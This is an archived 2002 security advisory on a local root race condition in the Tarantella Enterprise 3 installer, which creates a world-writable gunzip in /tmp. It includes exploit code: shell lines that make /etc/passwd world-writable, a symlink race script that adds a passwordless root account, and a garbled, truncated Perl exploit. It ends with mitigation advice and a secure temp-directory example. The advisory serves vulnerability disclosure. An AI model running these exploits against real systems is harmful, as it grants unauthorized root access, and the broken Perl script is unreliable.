
Tarantella local root compromise at installation time via bad tmp practice
28th Jan 2002 [SBWID-5035]

	 Tarantella 3

	"Larry W. Cashdollar" in "Vapid Labs" advisory says:

	The installation script provided with Tarantella handles utility
	packages during installation insecurely. A root-owned binary "gunzip"
	is created in /tmp with world-writable permissions; the PID is
	appended to the filename.

	$ ls -l /tmp/gunzip16152
	-rwxrwxrwx    1 root     root        51808 Jan 14 00:15 gunzip16152

	gunzip is extracted:

		extract gunzip > "$TMP_GUNZIP" 2>>$SHXLOGFILE
		extract gunzip | uncompress > "$TMP_GUNZIP" 2>>$SHXLOGFILE

	The permissions of gunzip are changed to rwx for all:

		chmod 777 $TMP_GUNZIP >/dev/null 2>&1

	The binary is used during installation:

		extract $efilename | $TMP_GUNZIP -q > "$efilename"

	There is a race condition between when gunzip is extracted and when
	it is used during installation, at which time a malicious local user
	could inject code to compromise the system quickly.

	$ echo "#!/bin/sh" > /tmp/
	$ echo "chmod 777 /etc/passwd" >> /tmp/
	$ cat /tmp/ > /tmp/gunzip16152


	I was able to change the permissions of /etc/passwd to 777 by
	performing the above as an unprivileged user.

	In a script:



	#Larry W. Cashdollar
	#Tarantella Enterprise 3 symlink local root Installation exploit
	#For educational purposes only.
	#tested on Linux.  run and wait.

	echo "Creating symlink."
	/bin/ln -s /etc/passwd /tmp/spinning

	echo "Waiting for tarantella installation."

	while true
	do
		echo -n .
		if [ -w /etc/passwd ]
		then
			echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
			su - tarexp
		fi
	done


	#!/usr/bin/perl -w
	#Another Exploit for tarantella enterprise 3 installation.
	#Larry Cashdollar 2/08/2002
	#Exploits gunzip$$ binary being created in /tmp with perm 777
	#Experimental ext3 kernel mods for preventing/researching race conditions.

	use strict;

	`cat  <<  -EOF- >

	chmod 777 /etc/passwd
	echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd

	my $OUT = '';

	while(!$OUT) {
		$OUT =  `ps -ax |grep gunzip |grep -v grep`;
		print "Found $OUT\n";

	my @args  = split(' ',$OUT);
	# Do this with one copy operation. This will break installation of tarantella.
	# should test for -w on /etc/passwd stop and su - tarexp.
	while(1) {
	`cp $args[4]`;

	Perhaps create a directory in /tmp or /var/tmp and use that directory
	as a work place?

	umask 077
	mkdir /tmp/workdir
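
	An added example (not part of the advisory and not Tarantella's installer
	code) of the private work-directory approach suggested above. It uses
	mktemp -d for an unpredictable name in place of the fixed /tmp/workdir;
	the function names and the staged helper are assumptions for illustration.

```shell
#!/bin/sh
# Added example: stage an installer helper in a private directory instead of
# a world-writable /tmp/gunzip$$. All function names here are hypothetical.

# Create a mode-0700 work directory with an unpredictable name; print its path.
make_workdir() {
    (
        umask 077
        # mktemp -d fails rather than reusing an existing path, so a
        # pre-planted directory or symlink cannot be adopted.
        mktemp -d "${TMPDIR:-/tmp}/install.XXXXXXXXXX"
    )
}

# Write stdin to $workdir/$name as an owner-only executable; print its path.
stage_helper() {
    workdir=$1
    name=$2
    (
        umask 077
        set -C                      # noclobber: '>' refuses an existing file
        cat > "$workdir/$name"
    ) || return 1
    chmod 700 "$workdir/$name" || return 1   # owner only, never 777
    printf '%s\n' "$workdir/$name"
}

# Re-check just before use: regular file, not a symlink, and neither the
# helper nor its directory grants any group/other permission bits.
helper_is_private() {
    helper=$1
    dir=$(dirname "$helper")
    [ -f "$helper" ] || return 1
    [ ! -L "$helper" ] || return 1
    case $(ls -ld "$dir") in drwx------*) ;; *) return 1 ;; esac
    case $(ls -l "$helper") in -rwx------*) ;; *) return 1 ;; esac
    return 0
}
```

	An installer would call helper_is_private on the staged path right before
	piping data through it, and abort if the check fails.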



	 Update (05 April 2002)



	Tarantella addressed these issues in a security bulletin:

